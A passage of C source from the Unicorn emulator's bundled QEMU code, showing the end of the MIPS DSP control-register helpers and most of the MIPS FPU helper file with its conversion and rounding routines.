} } #endif void cpu_wrdsp(uint32_t rs, uint32_t mask_num, CPUMIPSState *env) { uint8_t mask[6]; uint8_t i; uint32_t newbits, overwrite; target_ulong dsp; newbits = 0x00; overwrite = 0xFFFFFFFF; dsp = env->active_tc.DSPControl; for (i = 0; i < 6; i++) { mask[i] = (mask_num >> i) & 0x01; } if (mask[0] == 1) { #if defined(TARGET_MIPS64) overwrite &= 0xFFFFFF80; newbits &= 0xFFFFFF80; newbits |= 0x0000007F & rs; #else overwrite &= 0xFFFFFFC0; newbits &= 0xFFFFFFC0; newbits |= 0x0000003F & rs; #endif } if (mask[1] == 1) { overwrite &= 0xFFFFE07F; newbits &= 0xFFFFE07F; newbits |= 0x00001F80 & rs; } if (mask[2] == 1) { overwrite &= 0xFFFFDFFF; newbits &= 0xFFFFDFFF; newbits |= 0x00002000 & rs; } if (mask[3] == 1) { overwrite &= 0xFF00FFFF; newbits &= 0xFF00FFFF; newbits |= 0x00FF0000 & rs; } if (mask[4] == 1) { overwrite &= 0x00FFFFFF; newbits &= 0x00FFFFFF; #if defined(TARGET_MIPS64) newbits |= 0xFF000000 & rs; #else newbits |= 0x0F000000 & rs; #endif } if (mask[5] == 1) { overwrite &= 0xFFFFBFFF; newbits &= 0xFFFFBFFF; newbits |= 0x00004000 & rs; } dsp = dsp & overwrite; dsp = dsp | newbits; env->active_tc.DSPControl = dsp; } void helper_wrdsp(target_ulong rs, target_ulong mask_num, CPUMIPSState *env) { cpu_wrdsp(rs, mask_num, env); } uint32_t cpu_rddsp(uint32_t mask_num, CPUMIPSState *env) { uint8_t mask[6]; uint32_t ruler, i; target_ulong temp; target_ulong dsp; ruler = 0x01; for (i = 0; i < 6; i++) { mask[i] = (mask_num & ruler) >> i ; ruler = ruler << 1; } temp = 0x00; dsp = env->active_tc.DSPControl; if (mask[0] == 1) { #if defined(TARGET_MIPS64) temp |= dsp & 0x7F; #else temp |= dsp & 0x3F; #endif } if (mask[1] == 1) { temp |= dsp & 0x1F80; } if (mask[2] == 1) { temp |= dsp & 0x2000; } if (mask[3] == 1) { temp |= dsp & 0x00FF0000; } if (mask[4] == 1) { #if defined(TARGET_MIPS64) temp |= dsp & 0xFF000000; #else temp |= dsp & 0x0F000000; #endif } if (mask[5] == 1) { temp |= dsp & 0x4000; } return temp; } target_ulong helper_rddsp(target_ulong mask_num, CPUMIPSState *env) { return 
cpu_rddsp(mask_num, env);
}

#undef MIPSDSP_LHI
#undef MIPSDSP_LLO
#undef MIPSDSP_HI
#undef MIPSDSP_LO
#undef MIPSDSP_Q3
#undef MIPSDSP_Q2
#undef MIPSDSP_Q1
#undef MIPSDSP_Q0
#undef MIPSDSP_SPLIT32_8
#undef MIPSDSP_SPLIT32_16
#undef MIPSDSP_RETURN32_8
#undef MIPSDSP_RETURN32_16
#ifdef TARGET_MIPS64
#undef MIPSDSP_SPLIT64_16
#undef MIPSDSP_SPLIT64_32
#undef MIPSDSP_RETURN64_16
#undef MIPSDSP_RETURN64_32
#endif

unicorn-2.1.1/qemu/target/mips/fpu_helper.c

/*
 * Helpers for emulation of FPU-related MIPS instructions.
 *
 * Copyright (C) 2004-2005 Jocelyn Mayer
 * Copyright (C) 2020 Wave Computing, Inc.
 * Copyright (C) 2020 Aleksandar Markovic <amarkovic@wavecomp.com>
 *
 * This library is free software; you can redistribute it and/or
 * modify it under the terms of the GNU Lesser General Public
 * License as published by the Free Software Foundation; either
 * version 2 of the License, or (at your option) any later version.
 *
 * This library is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
 * Lesser General Public License for more details.
 *
 * You should have received a copy of the GNU Lesser General Public
 * License along with this library; if not, see <http://www.gnu.org/licenses/>.
 *
 */

#include "qemu/osdep.h"
#include "cpu.h"
#include "internal.h"
#include "qemu/host-utils.h"
#include "exec/helper-proto.h"
#include "exec/exec-all.h"
#include "exec/cpu_ldst.h"
#include "exec/memop.h"
//#include "sysemu/kvm.h"
#include "fpu/softfloat.h"

/* Complex FPU operations which may need stack space.
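 *
 * Editorial note (an illustrative assumption, not part of the original
 * source): the ieee_rm[] table defined just below is indexed by the two
 * RM bits of FCR31, typically consumed as
 *     set_float_rounding_mode(ieee_rm[env->active_fpu.fcr31 & 3],
 *                             &env->active_fpu.fp_status);
 * so RM=0 rounds to nearest-even, 1 toward zero, 2 up, and 3 down.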
*/ #define FLOAT_TWO32 make_float32(1 << 30) #define FLOAT_TWO64 make_float64(1ULL << 62) #define FP_TO_INT32_OVERFLOW 0x7fffffff #define FP_TO_INT64_OVERFLOW 0x7fffffffffffffffULL /* convert MIPS rounding mode in FCR31 to IEEE library */ unsigned int ieee_rm[] = { float_round_nearest_even, float_round_to_zero, float_round_up, float_round_down }; target_ulong helper_cfc1(CPUMIPSState *env, uint32_t reg) { target_ulong arg1 = 0; switch (reg) { case 0: arg1 = (int32_t)env->active_fpu.fcr0; break; case 1: /* UFR Support - Read Status FR */ if (env->active_fpu.fcr0 & (1 << FCR0_UFRP)) { if (env->CP0_Config5 & (1 << CP0C5_UFR)) { arg1 = (int32_t) ((env->CP0_Status & (1 << CP0St_FR)) >> CP0St_FR); } else { do_raise_exception(env, EXCP_RI, GETPC()); } } break; case 5: /* FRE Support - read Config5.FRE bit */ if (env->active_fpu.fcr0 & (1 << FCR0_FREP)) { if (env->CP0_Config5 & (1 << CP0C5_UFE)) { arg1 = (env->CP0_Config5 >> CP0C5_FRE) & 1; } else { helper_raise_exception(env, EXCP_RI); } } break; case 25: arg1 = ((env->active_fpu.fcr31 >> 24) & 0xfe) | ((env->active_fpu.fcr31 >> 23) & 0x1); break; case 26: arg1 = env->active_fpu.fcr31 & 0x0003f07c; break; case 28: arg1 = (env->active_fpu.fcr31 & 0x00000f83) | ((env->active_fpu.fcr31 >> 22) & 0x4); break; default: arg1 = (int32_t)env->active_fpu.fcr31; break; } return arg1; } void helper_ctc1(CPUMIPSState *env, target_ulong arg1, uint32_t fs, uint32_t rt) { switch (fs) { case 1: /* UFR Alias - Reset Status FR */ if (!((env->active_fpu.fcr0 & (1 << FCR0_UFRP)) && (rt == 0))) { return; } if (env->CP0_Config5 & (1 << CP0C5_UFR)) { env->CP0_Status &= ~(1 << CP0St_FR); compute_hflags(env); } else { do_raise_exception(env, EXCP_RI, GETPC()); } break; case 4: /* UNFR Alias - Set Status FR */ if (!((env->active_fpu.fcr0 & (1 << FCR0_UFRP)) && (rt == 0))) { return; } if (env->CP0_Config5 & (1 << CP0C5_UFR)) { env->CP0_Status |= (1 << CP0St_FR); compute_hflags(env); } else { do_raise_exception(env, EXCP_RI, GETPC()); } break; case 5: /* FRE Support - clear Config5.FRE bit */ if (!((env->active_fpu.fcr0 & (1 << FCR0_FREP)) && (rt == 0))) { return; } if (env->CP0_Config5 & (1 << CP0C5_UFE)) { env->CP0_Config5 &= ~(1 << CP0C5_FRE); compute_hflags(env); } else { helper_raise_exception(env, EXCP_RI); } break; case 6: /* FRE Support - set Config5.FRE bit */ if (!((env->active_fpu.fcr0 & (1 << FCR0_FREP)) && (rt == 0))) { return; } if (env->CP0_Config5 & (1 << CP0C5_UFE)) { env->CP0_Config5 |= (1 << CP0C5_FRE); compute_hflags(env); } else { helper_raise_exception(env, EXCP_RI); } break; case 25: if ((env->insn_flags & ISA_MIPS32R6) || (arg1 & 0xffffff00)) { return; } env->active_fpu.fcr31 = (env->active_fpu.fcr31 & 0x017fffff) | ((arg1 & 0xfe) << 24) | ((arg1 & 0x1) << 23); break; case 26: if (arg1 & 0x007c0000) { return; } env->active_fpu.fcr31 = (env->active_fpu.fcr31 & 0xfffc0f83) | (arg1 & 0x0003f07c); break; case 28: if (arg1 & 0x007c0000) { return; } env->active_fpu.fcr31 = (env->active_fpu.fcr31 & 0xfefff07c) | (arg1 & 0x00000f83) | ((arg1 & 0x4) << 22); break; case 31: env->active_fpu.fcr31 = (arg1 & env->active_fpu.fcr31_rw_bitmask) | (env->active_fpu.fcr31 & ~(env->active_fpu.fcr31_rw_bitmask)); break; default: if (env->insn_flags & ISA_MIPS32R6) { do_raise_exception(env, EXCP_RI, GETPC()); } return; } restore_fp_status(env); set_float_exception_flags(0, &env->active_fpu.fp_status); if ((GET_FP_ENABLE(env->active_fpu.fcr31) | 0x20) & GET_FP_CAUSE(env->active_fpu.fcr31)) { do_raise_exception(env, EXCP_FPE, GETPC()); } } int ieee_ex_to_mips(int xcpt) { int 
    ret = 0;
    if (xcpt) {
        if (xcpt & float_flag_invalid) {
            ret |= FP_INVALID;
        }
        if (xcpt & float_flag_overflow) {
            ret |= FP_OVERFLOW;
        }
        if (xcpt & float_flag_underflow) {
            ret |= FP_UNDERFLOW;
        }
        if (xcpt & float_flag_divbyzero) {
            ret |= FP_DIV0;
        }
        if (xcpt & float_flag_inexact) {
            ret |= FP_INEXACT;
        }
    }
    return ret;
}

static inline void update_fcr31(CPUMIPSState *env, uintptr_t pc)
{
    int tmp = ieee_ex_to_mips(get_float_exception_flags(
                                  &env->active_fpu.fp_status));

    SET_FP_CAUSE(env->active_fpu.fcr31, tmp);

    if (tmp) {
        set_float_exception_flags(0, &env->active_fpu.fp_status);

        if (GET_FP_ENABLE(env->active_fpu.fcr31) & tmp) {
            do_raise_exception(env, EXCP_FPE, pc);
        } else {
            UPDATE_FP_FLAGS(env->active_fpu.fcr31, tmp);
        }
    }
}

/*
 * Float support.
 * Single precision routines have an "s" suffix, double precision a
 * "d" suffix, 32bit integer "w", 64bit integer "l", paired single "ps",
 * paired single lower "pl", paired single upper "pu".
 */

/* unary operations, modifying fp status */
uint64_t helper_float_sqrt_d(CPUMIPSState *env, uint64_t fdt0)
{
    fdt0 = float64_sqrt(fdt0, &env->active_fpu.fp_status);
    update_fcr31(env, GETPC());
    return fdt0;
}

uint32_t helper_float_sqrt_s(CPUMIPSState *env, uint32_t fst0)
{
    fst0 = float32_sqrt(fst0, &env->active_fpu.fp_status);
    update_fcr31(env, GETPC());
    return fst0;
}

uint64_t helper_float_cvtd_s(CPUMIPSState *env, uint32_t fst0)
{
    uint64_t fdt2;

    fdt2 = float32_to_float64(fst0, &env->active_fpu.fp_status);
    update_fcr31(env, GETPC());
    return fdt2;
}

uint64_t helper_float_cvtd_w(CPUMIPSState *env, uint32_t wt0)
{
    uint64_t fdt2;

    fdt2 = int32_to_float64(wt0, &env->active_fpu.fp_status);
    update_fcr31(env, GETPC());
    return fdt2;
}

uint64_t helper_float_cvtd_l(CPUMIPSState *env, uint64_t dt0)
{
    uint64_t fdt2;

    fdt2 = int64_to_float64(dt0, &env->active_fpu.fp_status);
    update_fcr31(env, GETPC());
    return fdt2;
}

uint64_t helper_float_cvt_l_d(CPUMIPSState *env, uint64_t fdt0)
{
    uint64_t dt2;

    dt2 = float64_to_int64(fdt0, &env->active_fpu.fp_status);
    if (get_float_exception_flags(&env->active_fpu.fp_status)
        & (float_flag_invalid | float_flag_overflow)) {
        dt2 = FP_TO_INT64_OVERFLOW;
    }
    update_fcr31(env, GETPC());
    return dt2;
}

uint64_t helper_float_cvt_l_s(CPUMIPSState *env, uint32_t fst0)
{
    uint64_t dt2;

    dt2 = float32_to_int64(fst0, &env->active_fpu.fp_status);
    if (get_float_exception_flags(&env->active_fpu.fp_status)
        & (float_flag_invalid | float_flag_overflow)) {
        dt2 = FP_TO_INT64_OVERFLOW;
    }
    update_fcr31(env, GETPC());
    return dt2;
}

uint64_t helper_float_cvtps_pw(CPUMIPSState *env, uint64_t dt0)
{
    uint32_t fst2;
    uint32_t fsth2;

    fst2 = int32_to_float32(dt0 & 0XFFFFFFFF, &env->active_fpu.fp_status);
    fsth2 = int32_to_float32(dt0 >> 32, &env->active_fpu.fp_status);
    update_fcr31(env, GETPC());
    return ((uint64_t)fsth2 << 32) | fst2;
}

uint64_t helper_float_cvtpw_ps(CPUMIPSState *env, uint64_t fdt0)
{
    uint32_t wt2;
    uint32_t wth2;
    int excp, excph;

    wt2 = float32_to_int32(fdt0 & 0XFFFFFFFF, &env->active_fpu.fp_status);
    excp = get_float_exception_flags(&env->active_fpu.fp_status);
    if (excp & (float_flag_overflow | float_flag_invalid)) {
        wt2 = FP_TO_INT32_OVERFLOW;
    }
    set_float_exception_flags(0, &env->active_fpu.fp_status);

    wth2 = float32_to_int32(fdt0 >> 32, &env->active_fpu.fp_status);
    excph = get_float_exception_flags(&env->active_fpu.fp_status);
    if (excph & (float_flag_overflow | float_flag_invalid)) {
        wth2 = FP_TO_INT32_OVERFLOW;
    }
    set_float_exception_flags(excp | excph, &env->active_fpu.fp_status);
    update_fcr31(env, GETPC());

    return ((uint64_t)wth2 << 32) | wt2;
}

uint32_t
helper_float_cvts_d(CPUMIPSState *env, uint64_t fdt0) { uint32_t fst2; fst2 = float64_to_float32(fdt0, &env->active_fpu.fp_status); update_fcr31(env, GETPC()); return fst2; } uint32_t helper_float_cvts_w(CPUMIPSState *env, uint32_t wt0) { uint32_t fst2; fst2 = int32_to_float32(wt0, &env->active_fpu.fp_status); update_fcr31(env, GETPC()); return fst2; } uint32_t helper_float_cvts_l(CPUMIPSState *env, uint64_t dt0) { uint32_t fst2; fst2 = int64_to_float32(dt0, &env->active_fpu.fp_status); update_fcr31(env, GETPC()); return fst2; } uint32_t helper_float_cvts_pl(CPUMIPSState *env, uint32_t wt0) { uint32_t wt2; wt2 = wt0; update_fcr31(env, GETPC()); return wt2; } uint32_t helper_float_cvts_pu(CPUMIPSState *env, uint32_t wth0) { uint32_t wt2; wt2 = wth0; update_fcr31(env, GETPC()); return wt2; } uint32_t helper_float_cvt_w_s(CPUMIPSState *env, uint32_t fst0) { uint32_t wt2; wt2 = float32_to_int32(fst0, &env->active_fpu.fp_status); if (get_float_exception_flags(&env->active_fpu.fp_status) & (float_flag_invalid | float_flag_overflow)) { wt2 = FP_TO_INT32_OVERFLOW; } update_fcr31(env, GETPC()); return wt2; } uint32_t helper_float_cvt_w_d(CPUMIPSState *env, uint64_t fdt0) { uint32_t wt2; wt2 = float64_to_int32(fdt0, &env->active_fpu.fp_status); if (get_float_exception_flags(&env->active_fpu.fp_status) & (float_flag_invalid | float_flag_overflow)) { wt2 = FP_TO_INT32_OVERFLOW; } update_fcr31(env, GETPC()); return wt2; } uint64_t helper_float_round_l_d(CPUMIPSState *env, uint64_t fdt0) { uint64_t dt2; set_float_rounding_mode(float_round_nearest_even, &env->active_fpu.fp_status); dt2 = float64_to_int64(fdt0, &env->active_fpu.fp_status); restore_rounding_mode(env); if (get_float_exception_flags(&env->active_fpu.fp_status) & (float_flag_invalid | float_flag_overflow)) { dt2 = FP_TO_INT64_OVERFLOW; } update_fcr31(env, GETPC()); return dt2; } uint64_t helper_float_round_l_s(CPUMIPSState *env, uint32_t fst0) { uint64_t dt2; set_float_rounding_mode(float_round_nearest_even, &env->active_fpu.fp_status); dt2 = float32_to_int64(fst0, &env->active_fpu.fp_status); restore_rounding_mode(env); if (get_float_exception_flags(&env->active_fpu.fp_status) & (float_flag_invalid | float_flag_overflow)) { dt2 = FP_TO_INT64_OVERFLOW; } update_fcr31(env, GETPC()); return dt2; } uint32_t helper_float_round_w_d(CPUMIPSState *env, uint64_t fdt0) { uint32_t wt2; set_float_rounding_mode(float_round_nearest_even, &env->active_fpu.fp_status); wt2 = float64_to_int32(fdt0, &env->active_fpu.fp_status); restore_rounding_mode(env); if (get_float_exception_flags(&env->active_fpu.fp_status) & (float_flag_invalid | float_flag_overflow)) { wt2 = FP_TO_INT32_OVERFLOW; } update_fcr31(env, GETPC()); return wt2; } uint32_t helper_float_round_w_s(CPUMIPSState *env, uint32_t fst0) { uint32_t wt2; set_float_rounding_mode(float_round_nearest_even, &env->active_fpu.fp_status); wt2 = float32_to_int32(fst0, &env->active_fpu.fp_status); restore_rounding_mode(env); if (get_float_exception_flags(&env->active_fpu.fp_status) & (float_flag_invalid | float_flag_overflow)) { wt2 = FP_TO_INT32_OVERFLOW; } update_fcr31(env, GETPC()); return wt2; } uint64_t helper_float_trunc_l_d(CPUMIPSState *env, uint64_t fdt0) { uint64_t dt2; dt2 = float64_to_int64_round_to_zero(fdt0, &env->active_fpu.fp_status); if (get_float_exception_flags(&env->active_fpu.fp_status) & (float_flag_invalid | float_flag_overflow)) { dt2 = FP_TO_INT64_OVERFLOW; } update_fcr31(env, GETPC()); return dt2; } uint64_t helper_float_trunc_l_s(CPUMIPSState *env, uint32_t fst0) { uint64_t dt2; dt2 = 
float32_to_int64_round_to_zero(fst0, &env->active_fpu.fp_status); if (get_float_exception_flags(&env->active_fpu.fp_status) & (float_flag_invalid | float_flag_overflow)) { dt2 = FP_TO_INT64_OVERFLOW; } update_fcr31(env, GETPC()); return dt2; } uint32_t helper_float_trunc_w_d(CPUMIPSState *env, uint64_t fdt0) { uint32_t wt2; wt2 = float64_to_int32_round_to_zero(fdt0, &env->active_fpu.fp_status); if (get_float_exception_flags(&env->active_fpu.fp_status) & (float_flag_invalid | float_flag_overflow)) { wt2 = FP_TO_INT32_OVERFLOW; } update_fcr31(env, GETPC()); return wt2; } uint32_t helper_float_trunc_w_s(CPUMIPSState *env, uint32_t fst0) { uint32_t wt2; wt2 = float32_to_int32_round_to_zero(fst0, &env->active_fpu.fp_status); if (get_float_exception_flags(&env->active_fpu.fp_status) & (float_flag_invalid | float_flag_overflow)) { wt2 = FP_TO_INT32_OVERFLOW; } update_fcr31(env, GETPC()); return wt2; } uint64_t helper_float_ceil_l_d(CPUMIPSState *env, uint64_t fdt0) { uint64_t dt2; set_float_rounding_mode(float_round_up, &env->active_fpu.fp_status); dt2 = float64_to_int64(fdt0, &env->active_fpu.fp_status); restore_rounding_mode(env); if (get_float_exception_flags(&env->active_fpu.fp_status) & (float_flag_invalid | float_flag_overflow)) { dt2 = FP_TO_INT64_OVERFLOW; } update_fcr31(env, GETPC()); return dt2; } uint64_t helper_float_ceil_l_s(CPUMIPSState *env, uint32_t fst0) { uint64_t dt2; set_float_rounding_mode(float_round_up, &env->active_fpu.fp_status); dt2 = float32_to_int64(fst0, &env->active_fpu.fp_status); restore_rounding_mode(env); if (get_float_exception_flags(&env->active_fpu.fp_status) & (float_flag_invalid | float_flag_overflow)) { dt2 = FP_TO_INT64_OVERFLOW; } update_fcr31(env, GETPC()); return dt2; } uint32_t helper_float_ceil_w_d(CPUMIPSState *env, uint64_t fdt0) { uint32_t wt2; set_float_rounding_mode(float_round_up, &env->active_fpu.fp_status); wt2 = float64_to_int32(fdt0, &env->active_fpu.fp_status); restore_rounding_mode(env); if (get_float_exception_flags(&env->active_fpu.fp_status) & (float_flag_invalid | float_flag_overflow)) { wt2 = FP_TO_INT32_OVERFLOW; } update_fcr31(env, GETPC()); return wt2; } uint32_t helper_float_ceil_w_s(CPUMIPSState *env, uint32_t fst0) { uint32_t wt2; set_float_rounding_mode(float_round_up, &env->active_fpu.fp_status); wt2 = float32_to_int32(fst0, &env->active_fpu.fp_status); restore_rounding_mode(env); if (get_float_exception_flags(&env->active_fpu.fp_status) & (float_flag_invalid | float_flag_overflow)) { wt2 = FP_TO_INT32_OVERFLOW; } update_fcr31(env, GETPC()); return wt2; } uint64_t helper_float_floor_l_d(CPUMIPSState *env, uint64_t fdt0) { uint64_t dt2; set_float_rounding_mode(float_round_down, &env->active_fpu.fp_status); dt2 = float64_to_int64(fdt0, &env->active_fpu.fp_status); restore_rounding_mode(env); if (get_float_exception_flags(&env->active_fpu.fp_status) & (float_flag_invalid | float_flag_overflow)) { dt2 = FP_TO_INT64_OVERFLOW; } update_fcr31(env, GETPC()); return dt2; } uint64_t helper_float_floor_l_s(CPUMIPSState *env, uint32_t fst0) { uint64_t dt2; set_float_rounding_mode(float_round_down, &env->active_fpu.fp_status); dt2 = float32_to_int64(fst0, &env->active_fpu.fp_status); restore_rounding_mode(env); if (get_float_exception_flags(&env->active_fpu.fp_status) & (float_flag_invalid | float_flag_overflow)) { dt2 = FP_TO_INT64_OVERFLOW; } update_fcr31(env, GETPC()); return dt2; } uint32_t helper_float_floor_w_d(CPUMIPSState *env, uint64_t fdt0) { uint32_t wt2; set_float_rounding_mode(float_round_down, &env->active_fpu.fp_status); wt2 
= float64_to_int32(fdt0, &env->active_fpu.fp_status); restore_rounding_mode(env); if (get_float_exception_flags(&env->active_fpu.fp_status) & (float_flag_invalid | float_flag_overflow)) { wt2 = FP_TO_INT32_OVERFLOW; } update_fcr31(env, GETPC()); return wt2; } uint32_t helper_float_floor_w_s(CPUMIPSState *env, uint32_t fst0) { uint32_t wt2; set_float_rounding_mode(float_round_down, &env->active_fpu.fp_status); wt2 = float32_to_int32(fst0, &env->active_fpu.fp_status); restore_rounding_mode(env); if (get_float_exception_flags(&env->active_fpu.fp_status) & (float_flag_invalid | float_flag_overflow)) { wt2 = FP_TO_INT32_OVERFLOW; } update_fcr31(env, GETPC()); return wt2; } uint64_t helper_float_cvt_2008_l_d(CPUMIPSState *env, uint64_t fdt0) { uint64_t dt2; dt2 = float64_to_int64(fdt0, &env->active_fpu.fp_status); if (get_float_exception_flags(&env->active_fpu.fp_status) & float_flag_invalid) { if (float64_is_any_nan(fdt0)) { dt2 = 0; } } update_fcr31(env, GETPC()); return dt2; } uint64_t helper_float_cvt_2008_l_s(CPUMIPSState *env, uint32_t fst0) { uint64_t dt2; dt2 = float32_to_int64(fst0, &env->active_fpu.fp_status); if (get_float_exception_flags(&env->active_fpu.fp_status) & float_flag_invalid) { if (float32_is_any_nan(fst0)) { dt2 = 0; } } update_fcr31(env, GETPC()); return dt2; } uint32_t helper_float_cvt_2008_w_d(CPUMIPSState *env, uint64_t fdt0) { uint32_t wt2; wt2 = float64_to_int32(fdt0, &env->active_fpu.fp_status); if (get_float_exception_flags(&env->active_fpu.fp_status) & float_flag_invalid) { if (float64_is_any_nan(fdt0)) { wt2 = 0; } } update_fcr31(env, GETPC()); return wt2; } uint32_t helper_float_cvt_2008_w_s(CPUMIPSState *env, uint32_t fst0) { uint32_t wt2; wt2 = float32_to_int32(fst0, &env->active_fpu.fp_status); if (get_float_exception_flags(&env->active_fpu.fp_status) & float_flag_invalid) { if (float32_is_any_nan(fst0)) { wt2 = 0; } } update_fcr31(env, GETPC()); return wt2; } uint64_t helper_float_round_2008_l_d(CPUMIPSState *env, uint64_t fdt0) { uint64_t dt2; set_float_rounding_mode(float_round_nearest_even, &env->active_fpu.fp_status); dt2 = float64_to_int64(fdt0, &env->active_fpu.fp_status); restore_rounding_mode(env); if (get_float_exception_flags(&env->active_fpu.fp_status) & float_flag_invalid) { if (float64_is_any_nan(fdt0)) { dt2 = 0; } } update_fcr31(env, GETPC()); return dt2; } uint64_t helper_float_round_2008_l_s(CPUMIPSState *env, uint32_t fst0) { uint64_t dt2; set_float_rounding_mode(float_round_nearest_even, &env->active_fpu.fp_status); dt2 = float32_to_int64(fst0, &env->active_fpu.fp_status); restore_rounding_mode(env); if (get_float_exception_flags(&env->active_fpu.fp_status) & float_flag_invalid) { if (float32_is_any_nan(fst0)) { dt2 = 0; } } update_fcr31(env, GETPC()); return dt2; } uint32_t helper_float_round_2008_w_d(CPUMIPSState *env, uint64_t fdt0) { uint32_t wt2; set_float_rounding_mode(float_round_nearest_even, &env->active_fpu.fp_status); wt2 = float64_to_int32(fdt0, &env->active_fpu.fp_status); restore_rounding_mode(env); if (get_float_exception_flags(&env->active_fpu.fp_status) & float_flag_invalid) { if (float64_is_any_nan(fdt0)) { wt2 = 0; } } update_fcr31(env, GETPC()); return wt2; } uint32_t helper_float_round_2008_w_s(CPUMIPSState *env, uint32_t fst0) { uint32_t wt2; set_float_rounding_mode(float_round_nearest_even, &env->active_fpu.fp_status); wt2 = float32_to_int32(fst0, &env->active_fpu.fp_status); restore_rounding_mode(env); if (get_float_exception_flags(&env->active_fpu.fp_status) & float_flag_invalid) { if (float32_is_any_nan(fst0)) { 
wt2 = 0; } } update_fcr31(env, GETPC()); return wt2; } uint64_t helper_float_trunc_2008_l_d(CPUMIPSState *env, uint64_t fdt0) { uint64_t dt2; dt2 = float64_to_int64_round_to_zero(fdt0, &env->active_fpu.fp_status); if (get_float_exception_flags(&env->active_fpu.fp_status) & float_flag_invalid) { if (float64_is_any_nan(fdt0)) { dt2 = 0; } } update_fcr31(env, GETPC()); return dt2; } uint64_t helper_float_trunc_2008_l_s(CPUMIPSState *env, uint32_t fst0) { uint64_t dt2; dt2 = float32_to_int64_round_to_zero(fst0, &env->active_fpu.fp_status); if (get_float_exception_flags(&env->active_fpu.fp_status) & float_flag_invalid) { if (float32_is_any_nan(fst0)) { dt2 = 0; } } update_fcr31(env, GETPC()); return dt2; } uint32_t helper_float_trunc_2008_w_d(CPUMIPSState *env, uint64_t fdt0) { uint32_t wt2; wt2 = float64_to_int32_round_to_zero(fdt0, &env->active_fpu.fp_status); if (get_float_exception_flags(&env->active_fpu.fp_status) & float_flag_invalid) { if (float64_is_any_nan(fdt0)) { wt2 = 0; } } update_fcr31(env, GETPC()); return wt2; } uint32_t helper_float_trunc_2008_w_s(CPUMIPSState *env, uint32_t fst0) { uint32_t wt2; wt2 = float32_to_int32_round_to_zero(fst0, &env->active_fpu.fp_status); if (get_float_exception_flags(&env->active_fpu.fp_status) & float_flag_invalid) { if (float32_is_any_nan(fst0)) { wt2 = 0; } } update_fcr31(env, GETPC()); return wt2; } uint64_t helper_float_ceil_2008_l_d(CPUMIPSState *env, uint64_t fdt0) { uint64_t dt2; set_float_rounding_mode(float_round_up, &env->active_fpu.fp_status); dt2 = float64_to_int64(fdt0, &env->active_fpu.fp_status); restore_rounding_mode(env); if (get_float_exception_flags(&env->active_fpu.fp_status) & float_flag_invalid) { if (float64_is_any_nan(fdt0)) { dt2 = 0; } } update_fcr31(env, GETPC()); return dt2; } uint64_t helper_float_ceil_2008_l_s(CPUMIPSState *env, uint32_t fst0) { uint64_t dt2; set_float_rounding_mode(float_round_up, &env->active_fpu.fp_status); dt2 = float32_to_int64(fst0, &env->active_fpu.fp_status); restore_rounding_mode(env); if (get_float_exception_flags(&env->active_fpu.fp_status) & float_flag_invalid) { if (float32_is_any_nan(fst0)) { dt2 = 0; } } update_fcr31(env, GETPC()); return dt2; } uint32_t helper_float_ceil_2008_w_d(CPUMIPSState *env, uint64_t fdt0) { uint32_t wt2; set_float_rounding_mode(float_round_up, &env->active_fpu.fp_status); wt2 = float64_to_int32(fdt0, &env->active_fpu.fp_status); restore_rounding_mode(env); if (get_float_exception_flags(&env->active_fpu.fp_status) & float_flag_invalid) { if (float64_is_any_nan(fdt0)) { wt2 = 0; } } update_fcr31(env, GETPC()); return wt2; } uint32_t helper_float_ceil_2008_w_s(CPUMIPSState *env, uint32_t fst0) { uint32_t wt2; set_float_rounding_mode(float_round_up, &env->active_fpu.fp_status); wt2 = float32_to_int32(fst0, &env->active_fpu.fp_status); restore_rounding_mode(env); if (get_float_exception_flags(&env->active_fpu.fp_status) & float_flag_invalid) { if (float32_is_any_nan(fst0)) { wt2 = 0; } } update_fcr31(env, GETPC()); return wt2; } uint64_t helper_float_floor_2008_l_d(CPUMIPSState *env, uint64_t fdt0) { uint64_t dt2; set_float_rounding_mode(float_round_down, &env->active_fpu.fp_status); dt2 = float64_to_int64(fdt0, &env->active_fpu.fp_status); restore_rounding_mode(env); if (get_float_exception_flags(&env->active_fpu.fp_status) & float_flag_invalid) { if (float64_is_any_nan(fdt0)) { dt2 = 0; } } update_fcr31(env, GETPC()); return dt2; } uint64_t helper_float_floor_2008_l_s(CPUMIPSState *env, uint32_t fst0) { uint64_t dt2; set_float_rounding_mode(float_round_down, 
&env->active_fpu.fp_status); dt2 = float32_to_int64(fst0, &env->active_fpu.fp_status); restore_rounding_mode(env); if (get_float_exception_flags(&env->active_fpu.fp_status) & float_flag_invalid) { if (float32_is_any_nan(fst0)) { dt2 = 0; } } update_fcr31(env, GETPC()); return dt2; } uint32_t helper_float_floor_2008_w_d(CPUMIPSState *env, uint64_t fdt0) { uint32_t wt2; set_float_rounding_mode(float_round_down, &env->active_fpu.fp_status); wt2 = float64_to_int32(fdt0, &env->active_fpu.fp_status); restore_rounding_mode(env); if (get_float_exception_flags(&env->active_fpu.fp_status) & float_flag_invalid) { if (float64_is_any_nan(fdt0)) { wt2 = 0; } } update_fcr31(env, GETPC()); return wt2; } uint32_t helper_float_floor_2008_w_s(CPUMIPSState *env, uint32_t fst0) { uint32_t wt2; set_float_rounding_mode(float_round_down, &env->active_fpu.fp_status); wt2 = float32_to_int32(fst0, &env->active_fpu.fp_status); restore_rounding_mode(env); if (get_float_exception_flags(&env->active_fpu.fp_status) & float_flag_invalid) { if (float32_is_any_nan(fst0)) { wt2 = 0; } } update_fcr31(env, GETPC()); return wt2; } /* unary operations, not modifying fp status */ #define FLOAT_UNOP(name) \ uint64_t helper_float_ ## name ## _d(uint64_t fdt0) \ { \ return float64_ ## name(fdt0); \ } \ uint32_t helper_float_ ## name ## _s(uint32_t fst0) \ { \ return float32_ ## name(fst0); \ } \ uint64_t helper_float_ ## name ## _ps(uint64_t fdt0) \ { \ uint32_t wt0; \ uint32_t wth0; \ \ wt0 = float32_ ## name(fdt0 & 0XFFFFFFFF); \ wth0 = float32_ ## name(fdt0 >> 32); \ return ((uint64_t)wth0 << 32) | wt0; \ } FLOAT_UNOP(abs) FLOAT_UNOP(chs) #undef FLOAT_UNOP /* MIPS specific unary operations */ uint64_t helper_float_recip_d(CPUMIPSState *env, uint64_t fdt0) { uint64_t fdt2; fdt2 = float64_div(float64_one, fdt0, &env->active_fpu.fp_status); update_fcr31(env, GETPC()); return fdt2; } uint32_t helper_float_recip_s(CPUMIPSState *env, uint32_t fst0) { uint32_t fst2; fst2 = float32_div(float32_one, fst0, &env->active_fpu.fp_status); update_fcr31(env, GETPC()); return fst2; } 